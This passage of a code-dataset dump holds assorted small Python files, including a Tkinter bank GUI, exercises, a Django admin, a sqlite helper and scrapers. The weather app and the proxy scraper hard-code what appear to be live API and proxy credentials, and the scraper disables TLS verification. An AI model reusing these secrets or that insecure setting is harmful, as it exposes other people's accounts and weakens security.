self.bttn_chPIN.grid(row=3, column=2, sticky=W)\n\n self.bttn_view_t = Button(self,\n text=\"View Transactions\",\n command=self.bttn_view_transactions)\n self.bttn_view_t.grid(row=4, column=2, sticky=W)\n\n # create text field\n self.output_txt = Text(self, width=55, height=10, wrap=WORD)\n self.output_txt.grid(row=6, column=0, columnspan=2)\n\n # ---------- SOME HELPING FUNCTIONS ---------\n\n def get_name_pin(self):\n try:\n self.name = self.name_ent.get()\n if len(self.name) == 0:\n raise ValueError(\"empty name\")\n self.pin = int(self.pin_ent.get())\n except ValueError as error:\n self.output_txt.delete(0.0, END)\n self.output_txt.insert(0.0, \"PIN needs to be an integer and name cannot be empty!\")\n return False\n else:\n return True\n\n def get_name_pin_amount(self):\n if self.get_name_pin() == False:\n 
return False\n else:\n try:\n self.amount = int(self.amount_ent.get())\n except ValueError as error:\n self.output_txt.delete(0.0, END)\n self.output_txt.insert(0.0, \"Amount needs to be an integer!\")\n return False\n else:\n return True\n\n # ---------- THIS IS THE FUNCTIONS EXECUTED BY THE GUI ITEMS ---------\n\n def bttn_create_account(self):\n if self.get_name_pin_amount() == True:\n if self.is_vip.get():\n lab4.account_dict[self.name] = lab4.PremiumAccount(self.name, self.amount, self.pin)\n else:\n lab4.account_dict[self.name] = lab4.Account(self.name, self.amount, self.pin)\n self.output_txt.delete(0.0, END)\n self.output_txt.insert(0.0, self.name + \" has a new account...\")\n\n def bttn_withdrawal(self):\n if self.get_name_pin_amount() == True:\n if self.name in lab4.account_dict:\n result = lab4.account_dict[self.name].withdrawal(self.amount, self.pin)\n else:\n result = self.name + \" does not have an account with us, would you like to create one?\"\n self.output_txt.delete(0.0, END)\n self.output_txt.insert(0.0, result)\n\n def bttn_deposit(self):\n if self.get_name_pin_amount() == True:\n if self.name in lab4.account_dict:\n result = lab4.account_dict[self.name].deposit(self.amount)\n else:\n result = self.name + \" does not have an account with us, would you like to create one?\"\n self.output_txt.delete(0.0, END)\n self.output_txt.insert(0.0, result)\n\n\n def bttn_change_PIN(self):\n old_pin = self.pin\n if self.get_name_pin() == True:\n if self.name in lab4.account_dict:\n result = lab4.account_dict[self.name].change_PIN(old_pin, self.pin)\n else:\n result = self.name + \" does not have an account with us, would you like to create one?\"\n self.output_txt.delete(0.0, END)\n self.output_txt.insert(0.0, result)\n\n\n def bttn_view_transactions(self):\n if self.get_name_pin() == True:\n if self.name in lab4.account_dict:\n if lab4.account_dict[self.name].ok_PIN(self.pin):\n result = lab4.account_dict[self.name]\n else:\n result = \"Wrong PIN\"\n else:\n result = self.name + \" does not have an account with us, would you like to create one?\"\n self.output_txt.delete(0.0, END)\n self.output_txt.insert(0.0, result)\n\n\n # ---------- SETTING UP THE MAIN WINDOW ---------\n\n\nroot = Tk()\nroot.title(\"The Mega-Bank\")\nroot.geometry(\"700x300\")\nmy_app = Application(root)\nroot.mainloop()\n\n\n\n\n\n","sub_path":"Lab4/lab4_gui.py","file_name":"lab4_gui.py","file_ext":"py","file_size_in_byte":5892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"319435857","text":"# Neeraja Ramanan - 06/25/2014\n# This program renders a parabolaidic curve using straight lines\nimport turtle\n\ndef drawLine(y,x, granularity, myTurtle):\n myTurtle.up()\n if y>base_y:\n myTurtle.goto(base_x,y)\n myTurtle.down()\n myTurtle.goto(x,base_y)\n drawLine(y-granularity,x+granularity,granularity,myTurtle)\n else:\n myTurtle.ht()\n\nif __name__==\"__main__\":\n myWin = turtle.Screen()\n myTurtle = turtle.Turtle()\n ypos = (myWin.window_height()/2)\n xpos = -1*((myWin.window_width()/2))\n global base_x\n base_x = xpos\n global base_y\n base_y = -1*ypos\n drawLine(ypos,xpos,30,myTurtle)\n myWin.exitonclick()\n","sub_path":"practice/curve.py","file_name":"curve.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"509647703","text":"words = input().split(' ')\nneeded_word = input()\nall_pal = []\nsearched_pal = 0\nfor i in words:\n if i[::-1] == needed_word:\n 
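# the word read backwards equals the searched word\n 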
searched_pal += 1\n if i[::-1] == i:\n all_pal.append(i)\nprint(all_pal)\nprint(f\"Found palindrome {searched_pal} times\")","sub_path":"Lists Advanced/3_Palindrome_Strings.py","file_name":"3_Palindrome_Strings.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"208185703","text":"from dwca_utils import response\nfrom dwca_utils import setup_actor_logging\nimport os\nimport logging\nimport uuid\nimport inspect\n\ndef python_actor(do_stuff):\n def do_stuffer(options):\n print (\"path\" + os.getcwd())\n setup_actor_logging(options)\n\n #logging.debug('Started %s' % __version__)\n logging.debug('options: %s' % options)\n\n # Make a list of keys in the response dictionary\n returnvars = ['workspace', 'outputfile', 'success', 'message', 'artifacts']\n\n ### Standard outputs ###\n success = False\n message = None\n\n ### Custom outputs ###\n\n # Make a dictionary for artifacts left behind\n artifacts = {}\n\n ### Establish variables ###\n inputfile = None\n outputfile = None\n\n ### Required inputs ###\n try:\n workspace = options['workspace']\n except:\n workspace = './'\n\n try:\n inputfile = options['inputfile']\n except:\n pass\n\n if inputfile is None or len(inputfile) == 0:\n #message = 'No input file given. %s' % __version__\n message = 'No input file given.'\n returnvals = [workspace, outputfile, success, message, artifacts]\n logging.debug('message:\\n%s' % message)\n return response(returnvars, returnvals)\n\n if os.path.isfile(inputfile) == False:\n #message = 'Input file %s not found. %s' % (inputfile, __version__)\n message = 'Input file %s not found.' % inputfile\n returnvals = [workspace, outputfile, success, message, artifacts]\n logging.debug('message:\\n%s' % message)\n return response(returnvars, returnvals)\n\n try:\n outputfile = options['outputfile']\n except:\n pass\n\n if outputfile is None or len(outputfile) == 0:\n outputfile = 'dwca_' + str(uuid.uuid1()) + '.zip'\n\n # Construct the output file path in the workspace\n outputfile = '%s/%s' % (workspace.rstrip('/'), outputfile)\n\n ### Optional inputs ###\n params = []\n argspec = inspect.getargspec(do_stuff)\n\n for arg in argspec.args:\n if arg == 'inputfile':\n params.append(inputfile)\n elif arg == 'outputfile':\n params.append(outputfile)\n elif arg == 'workspace':\n params.append(workspace)\n\n else:\n if (arg in options):\n params.append(options[arg])\n else:\n raise KeyError('%s not supplied as a parameter of %s in yaml config' % (arg, do_stuff.func_name))\n\n # Do the actual work now that the preparation is complete\n success = do_stuff(*params)\n\n # Add artifacts to the output dictionary if all went well\n if success == True:\n artifacts['template_output_file'] = outputfile\n\n # Prepare the response dictionary\n returnvals = [workspace, outputfile, success, message, artifacts]\n #logging.debug('Finishing %s' % __version__)\n logging.debug('Finishing')\n return response(returnvars, returnvals)\n return do_stuffer\n","sub_path":"packages/kurator_fp/actor_decorator.py","file_name":"actor_decorator.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"44697990","text":"import pyowm\r\nprint(\"To exit, enter, y/n\")\r\nwhile True:\r\n\ttry:\r\n\t\tcity = input(\"Which city are you interested in?: \")\r\n\t\tif city == 'y' or city == 'exit' or city == 'quit':\r\n\t\t\tbreak\r\n\t\tif city == 'n':\r\n\t\t\tpass\r\n\t\towm = 
pyowm.OWM('91c713db144e1ce5a94dffd4229169ed')\r\n\t\tobservation = owm.weather_at_place(city)\r\n\t\tw = observation.get_weather()\r\n\t\tt_temperature = w.get_temperature('celsius') ['temp']\r\n\t\tw_wind = w.get_wind()\r\n\t\th_humidity = w.get_humidity()\r\n\t\tdetailstat = w.get_detailed_status()\r\n\t\ttemp = 'In the city \"{0}\", the temperature is now {1}° Celsius.'.format(city, str(t_temperature))\r\n\t\twindd = 'Wind angle and speed: \"{0}\"'.format(str(w_wind))\r\n\t\thum = 'Humidity in \"{0}\": {1} %'.format(city, str(h_humidity))\r\n\t\tdet_list = 'Cloudiness: \"{0}\". \\nThat is all for today, thank you for using the program! \\n'.format(detailstat)\r\n\t\tprint(temp)\r\n\t\tprint(windd)\r\n\t\tprint(hum)\r\n\t\tprint(det_list)\r\n\texcept Exception:\r\n\t\tprint(\"Invalid location entered!\")\r\n","sub_path":"eng_weather_app.py","file_name":"eng_weather_app.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"637604289","text":"from django.contrib import admin\nfrom django.contrib.admin import SimpleListFilter, DateFieldListFilter\nfrom models import Photo, Album\n\n\nclass ImageSizeListFilter(SimpleListFilter):\n title = 'Image Size'\n parameter_name = 'size'\n\n def lookups(self, request, model_admin):\n return (\n ('<= 1MB', '< 1MB'),\n ('<= 10MB', '1MB < size <= 10MB'),\n ('<= 100MB', '10MB < size <= 100MB'),\n ('> 100MB', '> 100MB'), )\n\n def queryset(self, request, queryset):\n if self.value() == '<= 1MB':\n return queryset.filter(image_size__lte=1024 * 1024)\n if self.value() == '<= 10MB':\n return queryset.filter(\n image_size__gt=1024 * 1024,\n image_size__lte=10 * 1024 * 1024, )\n if self.value() == '<= 100MB':\n return queryset.filter(\n image_size__gt=10 * 1024 * 1024,\n image_size__lte=100 * 1024 * 1024, )\n if self.value() == '> 100MB':\n return queryset.filter(image_size__gt=100 * 1024 * 1024)\n\n\nclass PhotoAdmin(admin.ModelAdmin):\n\n def owner_link(self, photo):\n return u\"{}\".format(photo.owner.id, photo.owner)\n\n owner_link.short_description = ''\n owner_link.allow_tags = True\n\n fields = ('title',\n 'description',\n 'date_uploaded',\n 'date_modified',\n 'image',\n 'owner',\n 'published')\n readonly_fields = ('date_uploaded',\n 'date_modified',)\n list_display = ('title',\n 'owner_link',\n 'date_uploaded',\n 'date_modified',\n 'image_size')\n #list_display_links = (owner_link,)\n search_fields = ['owner__username',\n 'owner__email',\n 'owner__first_name',\n 'owner__last_name', ]\n # attribute_of_class must be in db, cannot be function\n list_filter = (('date_uploaded', DateFieldListFilter),\n (ImageSizeListFilter),)\n\n\nclass AlbumAdmin(admin.ModelAdmin):\n\n def owner_link(self, album):\n return u\"{}\".format(album.owner.id, album.owner)\n\n owner_link.short_description = ''\n owner_link.allow_tags = True\n\n fields = ('title',\n 'description',\n 'photos',\n 'owner',\n 'date_created',\n 'date_modified',\n 'cover_photo',\n 'published')\n readonly_fields = ('date_created', 'date_modified',)\n list_display = ('title',\n 'description',\n 'owner_link',\n 'date_created',\n 'date_modified',\n 'published',\n )\n list_display_links = ('title', 'date_created',)\n search_fields = ['owner__username',\n 'owner__email',\n 'owner__first_name',\n 'owner__last_name']\n\n\nadmin.site.register(Photo, PhotoAdmin)\nadmin.site.register(Album, 
AlbumAdmin)\n","sub_path":"imagr_images/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"343855038","text":"\"\"\"\nThis file can be imported for any interaction with the context database\nFunctions:\n\nadd_word_type(word_type)\n -adds the given word_type (context word) to the Word_Types table\n\nadd_word_types(word_types)\n -calls add_word_type() for each item in the array word_types\n\nadd_word(word, word_type)\n -adds word to the Words table and associates it with the word_type\n -returns false if word_type is not in the Word_Types table\n -returns false if word is already in the Words table\n\nadd_words(words, word_type)\n -calls add_word() for each word in words\n -applies the same given word_type to all words\n\nadd_device_action(action, word_type, extremity_level)\n -adds an action to the Device_Actions table associated with word_type and extremity_level\n -returns false if word_type is not in the Word_Types table\n -returns false if action is already in the Device_Actions table\n -may need tinkering after we understand how the actuators work\n\ncheck_word(word)\n -returns the context of the given word\n -if word = chilly\n -return = cold\n\ncheck_words(words)\n -returns an array of unique context words associated with the words in the given list\n\nget_words(word_type)\n -returns an array of all words in Words table associated with the given word_type\n\"\"\"\n\nimport sqlite3\n\n\ndef add_words(words, word_type):\n '''\n for adding batches of words\n words can be an array\n word_type should be a single value\n '''\n for word in words:\n add_word(word, word_type)\n\n\ndef add_word_types(word_types):\n '''\n for adding batches of word_types\n word_types can be an array\n '''\n for word_type in word_types:\n add_word_type(word_type)\n\n\ndef add_word(word, word_type):\n '''\n auto generates an ID and adds word with FK word_type\n word_type must already be in the DB\n prints to console if word_type is not already in the DB\n '''\n word = word.lower()\n word_type = word_type.lower()\n\n conn = sqlite3.connect('database/context.db')\n c = conn.cursor()\n\n c.execute(\"SELECT 1 FROM Words WHERE word=?\", (word,))\n item_exists = c.fetchone()\n if (item_exists):\n return False\n\n c.execute(\"SELECT MAX(id) FROM Words\")\n max_id = c.fetchone()\n\n if (max_id[0]):\n next_id = max_id[0] + 1\n else:\n next_id = 1\n\n c.execute(\"SELECT id FROM Word_Types WHERE word_type=?\", (word_type,))\n word_type_id = c.fetchone()\n\n if (word_type_id):\n with conn:\n c.execute(\"INSERT INTO Words VALUES (?, ?, ?)\",\n (next_id, word, word_type_id[0]))\n return True\n else:\n return False\n\n conn.close()\n\n\ndef add_word_type(word_type):\n '''\n auto generates an ID and adds the word_type\n '''\n word_type = word_type.lower()\n\n conn = sqlite3.connect('database/context.db')\n c = conn.cursor()\n\n c.execute(\"SELECT 1 FROM Word_Types WHERE word_type=?\", (word_type,))\n item_exists = c.fetchone()\n if (item_exists):\n return False\n\n c.execute(\"SELECT MAX(id) FROM Word_Types\")\n max_id = c.fetchone()\n\n if (max_id[0]):\n next_id = max_id[0] + 1\n else:\n next_id = 1\n\n with conn:\n c.execute(\"INSERT INTO Word_Types VALUES (?, ?)\", (next_id, word_type))\n\n conn.close()\n\n\ndef add_device_action(action, word_type, extremity_level):\n '''\n this may change depending on how we do actuators\n '''\n action = action.lower()\n word_type = word_type.lower()\n extremity_level 
= extremity_level.lower()\n\n conn = sqlite3.connect('database/context.db')\n c = conn.cursor()\n\n c.execute(\"SELECT 1 FROM Device_Actions WHERE device_action=?\", (action,))\n item_exists = c.fetchone()\n if (item_exists):\n return False\n\n c.execute(\"SELECT MAX(id) FROM Device_Actions\")\n max_id = c.fetchone()\n\n if (max_id[0]):\n next_id = max_id[0] + 1\n else:\n next_id = 1\n\n c.execute(\"SELECT id FROM Word_Types WHERE word_type=?\", (word_type,))\n word_type_id = c.fetchone()\n\n if (word_type_id):\n with conn:\n c.execute(\"INSERT INTO Device_Actions VALUES (?, ?, ?, ?)\",\n (next_id, action, word_type_id[0], extremity_level))\n else:\n print(\"Word type not found in database\")\n\n conn.close()\n\n\ndef check_word(word):\n '''\n returns the context of the given word\n if word = freezing\n return = cold\n '''\n word = word.lower()\n conn = sqlite3.connect('database/context.db')\n c = conn.cursor()\n\n c.execute(\"SELECT word_type_id FROM Words WHERE word=?\", (word,))\n word_type_id = c.fetchone()\n\n if (word_type_id):\n c.execute(\"SELECT word_type FROM Word_Types WHERE id=?\",\n (word_type_id[0],))\n word_type = c.fetchone()\n return word_type[0]\n\n else:\n return False\n\n\ndef check_words(words):\n contexts = []\n for word in words:\n context = check_word(word)\n if (context not in contexts and context != False):\n contexts.append(context)\n return contexts\n\n\ndef get_words(word_type):\n '''returns all words of specific word_type'''\n word_type = word_type.lower()\n\n conn = sqlite3.connect('database/context.db')\n c = conn.cursor()\n\n c.execute(\"SELECT id FROM Word_Types WHERE word_type=?\", (word_type,))\n word_type_id = c.fetchone()\n\n if (word_type_id):\n c.execute(\"SELECT word FROM Words WHERE word_type_id=?\",\n (word_type_id[0],))\n words = c.fetchall()\n else:\n return False\n\n if (words):\n return words\n else:\n return False\n","sub_path":"prototypes/database/database_manager.py","file_name":"database_manager.py","file_ext":"py","file_size_in_byte":5588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"429476924","text":"t=int(input())\nfor i in range(t):\n sa=input().split(' ')\n sb=input().split(' ')\n cele=0\n for d in sa:\n if(d in sb):\n cele=d\n break\n if(cele==0):\n print('No')\n continue\n\n sa.remove(cele)\n sb.remove(cele)\n if(int(sa[0])+int(sb[0])==int(cele)):\n print(\"Yes\")\n elif int(sa[0])==int(sb[0]) and int(cele)*2==int(sa[0]):\n print('Yes')\n else:\n print(\"No\")\n \n","sub_path":"Codeforces/Rating_B/Square.py","file_name":"Square.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"92086177","text":"'''\nLastEditors: 杜康\nLastEditTime: 2021-09-23 17:02:45\n'''\nfrom urllib.request import urlopen\n# handle 404 and 500 errors\nfrom urllib.error import HTTPError\n# handle URL errors\nfrom urllib.error import URLError\nfrom bs4 import BeautifulSoup\n\ndef getTitle (url):\n try:\n html = urlopen(url)\n except HTTPError as e:\n return None\n try:\n bs = BeautifulSoup(html.read(), 'html.parser')\n title = bs.body.h1\n except AttributeError as e:\n return None\n return title\n\ntitle = getTitle('http://www.pythonscraping.com/pages/page1.html')\nif title == None:\n print('Title could not be found')\nelse:\n print(title)","sub_path":"chapter-1/newWheel.py","file_name":"newWheel.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} 
+{"seq_id":"114296779","text":"'''\nConcrete SettingModule class for a specific experimental SettingModule\n'''\n\n# Copyright (c) 2017 Jiawei Zhang \n# License: TBD\n\nfrom setting import setting\n\n\n\nclass SettingTest(setting):\n \n def load_run_save_evaluate(self):\n \n # load dataset\n X_train, X_test, y_train, y_test = self.dataset.load()\n\n\n training_set = {'X':X_train, 'y':y_train}\n testing_set = {'X':X_test, 'y':y_test} #.ravel\n \n # run MethodModule\n self.method.data = {'train': training_set, 'test': testing_set}\n learned_result = self.method.run()\n \n # save raw ResultModule\n self.result.data = learned_result\n self.result.save()\n \n # evaluating ResultModule (optional)\n # evaluation can be done independently after getting the learning ResultModule\n self.evaluate.data = learned_result\n return self.evaluate.evaluate()\n\n ","sub_path":"ex/SettingTest.py","file_name":"SettingTest.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"274374299","text":"print(\"Command processor initializing.\")\n\n#import spacy\n#import ru2\n\nimport re\nimport atom.notify\nimport signal\nimport os\nimport traceback\nfrom random import randint\n\nimport atom.conver\n\nimport pymorphy2\nmorph = pymorphy2.MorphAnalyzer()\n\nPID = os.getpid()\n\ndef sigint_handler(signum, frame):\n\tprint(\"sigint_handler\")\n\tsig_names = {23:\"NSIG\", 22:\"SIGABRT\", 21:\"SIGBREAK\", 8:\"SIGFPE\", 4:\"SIGILL\",\n\t\t\t 2:\"SIGINT\", 11:\"SIGSEGV\", 15:\"SIGTERM\", 0:\"SIG_DFL\", 1:\"SIG_IGN\"}\n\n\tatom.send_notify(\"Получил сигнал {}. Завершаюсь.\".format(sig_names[signum]))\n\tos.kill(PID, signal.SIGKILL)\n\ndef incom(text):\n\tif len(text) == 0:\n\t\treturn\n\n\ttry:\t\n\t\ttext = text.strip().lower()\n\t\tprint(\"incom: {}\".format(text))\n\n\t\tresult, confidence = atom.conversation.listen(text)\n\t\t\n\t\tif confidence > 0.0:\n\t\t\tif callable(result):\n\t\t\t\tresult()\n\n\t\t\telse:\n\t\t\t\tatom.send_notify(result)\n\t\telse:\t\t\n\t\t\tatom.send_notify(\"Нераспознанная входная последовательность\")\n\t\t\t\n\t\t\tfor t in text.split():\n\t\t\t\tatom.send_notify(str(morph.parse(t)))\n\n\t\t\t\n\t\n\texcept Exception as ex:\n\t\tatom.send_notify(\"exception in incom thread: {}\".format(str(ex)))\n\t\ttraceback.print_exc()\n\n","sub_path":"atom/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"483312001","text":"import json\n\n#Convert all scraped data into arrays for processing.\nclinton_data_raw = open('clintondata.txt', 'r')\ntrump_data_raw = open('trumpdata.txt','r')\nclinton_data = clinton_data_raw.read()\ntrump_data = trump_data_raw.read()\nclinton_list = clinton_data.split(\",\")\ntrump_list = trump_data.split(\",\")\n\n#Make data symettric in relation to (latitude, longitude) pair. 
Convert to tuple\ntrump_tuple_list = [(trump_list[i],trump_list[i+1],trump_list[i+2]) for i in range(0,len(trump_list),3)]\nclinton_tuple_list = [(clinton_list[i],clinton_list[i+1],clinton_list[i+2]) for i in range(0,len(clinton_list),3)]\ntrump_tuple_list_sorted = sorted(trump_tuple_list, key=lambda element: (element[0],element[1]))\nclinton_tuple_list_sorted = sorted(clinton_tuple_list, key=lambda element: (element[0],element[1]))\n\n#Convert tuples to JSON formatted data\nclinton_list_clean = []\ntrump_list_clean = []\nfor i in range(0,len(trump_tuple_list_sorted)):\n\tclinton_list_clean.append(clinton_tuple_list_sorted[i][0])\n\tclinton_list_clean.append(clinton_tuple_list_sorted[i][1])\n\tclinton_list_clean.append(clinton_tuple_list_sorted[i][2])\n\ttrump_list_clean.append(trump_tuple_list_sorted[i][0])\n\ttrump_list_clean.append(trump_tuple_list_sorted[i][1])\n\ttrump_list_clean.append(trump_tuple_list_sorted[i][2])\n\nwith open('data.json', 'w') as new_file:\n\tjson.dump([[\"Clinton\", clinton_list_clean], [\"Trump\", trump_list_clean]], new_file)\n\n","sub_path":"DataProcessing/cleanup.py","file_name":"cleanup.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"616436010","text":"from textx import language, generator\nfrom .generators import load_metamodel\nfrom .generators.textmate_generator import TextMateGrammarGenerator\nfrom .utils import dump_to_file\n\n\n@language('EasyColorLang', '*.eclr')\ndef easy_coloring_lang():\n \"\"\"Language made for easier writing of TextMate grammars\"\"\"\n return load_metamodel()\n\n\n@generator('EasyColorLang', 'TextMate')\ndef textmate_gen_coloring(metamodel, model, output_path, overwrite, debug,\n **custom_args):\n \"\"\"Generator for TextMate syntax grammar from EasyColorLang spec\"\"\"\n ret_val = TextMateGrammarGenerator(model).generate()\n if not output_path:\n print(ret_val)\n else:\n dump_to_file(ret_val, output_path)\n return ret_val\n","sub_path":"gen_coloring/coloring_entry_point.py","file_name":"coloring_entry_point.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"136256270","text":"#В первой строке входных данных содержится целое число n - число классов.\n#В следующих n строках содержится описание наследования классов.\n# В i-й строке указано от каких классов наследуется i-й класс. \n# Обратите внимание, что класс может ни от кого не наследоваться. 
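# (Added illustration, not part of the original exercise.) A compact runnable
# version of the ancestor check this task asks for, mirroring the reference
# solution quoted at the end of this file; the sample hierarchy is made up:
parents_demo = {'A': [], 'B': ['A'], 'C': ['A'], 'D': ['B', 'C']}

def is_parent_demo(child, parent):
    # a class counts as its own ancestor here; otherwise recurse through the bases
    return child == parent or any(is_parent_demo(p, parent)
                                  for p in parents_demo[child])

assert is_parent_demo('D', 'A') and not is_parent_demo('A', 'D')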
\n# Гарантируется, что класс не наследуется сам от себя (прямо или косвенно), \n# что класс не наследуется явно от одного класса более одного раза.\n#В следующей строке содержится число q - количество запросов.\n#В следующих q строках содержится описание запросов в формате <имя класса 1> <имя класса 2>.\n#Имя класса – строка, состоящая из символов латинского алфавита, длины не более 50.\n#Для каждого запроса выведите в отдельной строке слово \"Yes\", \n# если класс 1 является предком класса 2, и \"No\", если не является.\n\nlst_mro = [ # список введённых строк\n 'G : F', \n 'A',\n 'B : A',\n 'C : A',\n 'D : B C',\n 'E : D',\n 'F : D',\n 'X',\n 'Y : X A', \n 'Z : X',\n 'V : Z Y',\n 'W : V',\n]\nlst_q = [ # список введённых запросов\n 'A G', # Yes # A предок G через B/C, D, F\n 'A Z', # No # Y потомок A, но не Y\n 'A W', # Yes # A предок W через Y, V\n 'X W', # Yes # X предок W через Y, V\n #'X QWE', # No # нет такого класса QWE\n 'A X', # No # классы есть, но они нет родства :)\n 'X X', # Yes # родитель он же потомок\n '1 1', # No # несуществующий класс\n 'E E',\n 'B W' \n]\n\nlist_my = [\n 'Q',\n 'W',\n 'E',\n 'R',\n 'C',\n 'T : W E',\n 'U : E',\n 'I : E',\n 'O : E R',\n 'H : Q T',\n 'J : T',\n 'K',\n 'L : U I O',\n 'P : R C',\n 'A : H J',\n 'S : J K L P',\n 'F : P',\n 'G',\n 'V : A',\n 'B : S',\n 'N : F',\n 'M : F G',\n 'Z : V B N',\n 'X : N M'\n]\nclasses = {}\nfor _ in lst_mro:\n com = _.split()\n if len(com) > 1:\n parents = com[2:]\n children = com[0]\n for i in parents:\n if children in classes:\n classes[children] += [i]\n else:\n classes[children] = [i]\n else:\n classes[com[0]] = [0]\nprint(classes)\n\ndef loop(lst_chi):\n for _ in range(len(lst_chi)):\n i = lst_chi[_]\n while 1:\n if i not in classes:\n break \n if par == i:\n return 1\n if len(classes[i]) > 1:\n if loop(classes[i]):\n return 1\n else:\n break \n else: \n i = classes[i][0]\n \n\n#for _ in lst_q:\n# par, chi = _.split()\nfor _ in range(int(input())):\n par, chi = input().split()\n while 1:\n if chi not in classes:\n print('No')\n break \n if par == chi:\n print('Yes')\n break\n if len(classes[chi]) > 1:\n if loop(classes[chi]):\n print('Yes')\n break\n else:\n print('No')\n break \n else: \n chi = classes[chi][0] \n \n#teacher's solution\n'''n = int(input())\n\nparents = {}\nfor _ in lst_mro:\n a = _.split()\n parents[a[0]] = [] if len(a) == 1 else a[2:]\n\ndef is_parent(child, parent):\n return child == parent or any(map(lambda p: is_parent(p, parent), parents[child]))\nprint(parents)\n#q = int(input())\nfor _ in lst_q:\n a, b = _.split()\n print(\"Yes\" if is_parent(b, a) else \"No\") \n''' ","sub_path":"1_7.py","file_name":"1_7.py","file_ext":"py","file_size_in_byte":4224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"43642131","text":"# -*- coding: utf-8 -*-\n# @Time  : 2021/2/18 3:18 下午\n# @Author : NewmanZhou\n# @Desc : ==============================================\n# Life is Short I Use Python!!!                      ===\n# If this runs wrong,don't ask me,I don't know why;  ===\n# If this runs right,thank god,and I don't know why. ===\n# Maybe the answer,my friend,is blowing in the wind. 
===\n# ======================================================\n# @Project : StudySpace\n# @FileName: gftest.py\n# @Software: PyCharm\n# !/usr/bin/python3\nimport sys\nimport time\nimport hashlib\nimport requests\nimport urllib3\nfrom lxml import etree\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n_version = sys.version_info\n\nis_python3 = (_version[0] == 3)\n\norderno = \"ZF20212183665Ed5nW3\"\nsecret = \"929b51ac17ac4b11b70aac963e31dd50\"\n\nip = \"forward.xdaili.cn\"\nport = \"80\"\n\nip_port = ip + \":\" + port\n\ntimestamp = str(int(time.time()))\nstring = \"\"\nstring = \"orderno=\" + orderno + \",\" + \"secret=\" + secret + \",\" + \"timestamp=\" + timestamp\n\nif is_python3:\n string = string.encode()\n\nmd5_string = hashlib.md5(string).hexdigest()\nsign = md5_string.upper()\n# print(sign)\nauth = \"sign=\" + sign + \"&\" + \"orderno=\" + orderno + \"&\" + \"timestamp=\" + timestamp\n\n# print(auth)\nproxy = {\"http\": \"http://\" + ip_port, \"https\": \"https://\" + ip_port}\nheaders = {'Proxy-Authorization': auth,\n 'sec-ch-ua': '\"Chromium\";v=\"88\", \"Google Chrome\";v=\"88\", \";Not A Brand\";v=\"99\"',\n 'sec-ch-ua-mobile': '?0',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36',\n 'Referer': 'https://www.dalipan.com/', }\nr = requests.get(\"https://www.dalipan.com/search?keyword=%E4%B8%89%E4%B8%80%E9%87%8D%E5%B7%A5\", headers=headers,\n proxies=proxy, verify=False, allow_redirects=False)\nr.encoding = 'utf8'\nprint(r.status_code)\nprint(r.text)\nif r.status_code == 302 or r.status_code == 301:\n loc = r.headers['Location']\n print(loc)\n r = requests.get(loc, headers=headers, proxies=proxy, verify=False, allow_redirects=False)\n r.encoding = 'utf8'\n print(r.status_code)\n print(r.text)\n","sub_path":"ThreatBook/gftest.py","file_name":"gftest.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"283579872","text":"# -*- coding: ISO-8859-1 -*-\r\n# LKM 04/03/2016\r\nimport codecs\r\nimport bs4\r\nimport csv\r\nfrom marlimvar import MarlimVar\r\ng_variaveis = None\r\n\r\ndef le_variaveis_de_controle():\r\n variaveis = []\r\n counter = 0\r\n with codecs.open('baricentro.xml', encoding='ISO-8859-1', mode='r+') as f:\r\n textData = f.read()\r\n bs = bs4.BeautifulSoup(textData, 'lxml')\r\n # os elementos utilizados para a sintonia são os marcados na interface como \"ativos\"\r\n active_elements = bs.find_all(\"as_var\", {\"ativo\": \"TRUE\"})\r\n\r\n for element in active_elements:\r\n nova_variavel = MarlimVar(nome=str(counter)+element.attrs['nome'])\r\n counter += 1\r\n variaveis.append(nova_variavel)\r\n\r\n # carrega trechos das variaveis\r\n for parametros in element.find_all('parametros'):\r\n for sisprod in parametros.find_all('param_sisprod_rotulo'):\r\n nova_variavel.trecho.append(sisprod.text.replace(\" \", \"\").replace(\"\\n\", \"\"))\r\n\r\n # carrega valores das variaveis\r\n for nofilho in element.find_all('valor'):\r\n nova_variavel.valor.append(float(nofilho.text))\r\n\r\n # carrega correlacoes das variaveis\r\n for nofilho in element.find_all('correlacao'):\r\n nova_variavel.correlacao.append(nofilho.text)\r\n\r\n with open('variaveis.csv', 'rt') as csvfile:\r\n spamreader = csv.reader(csvfile, 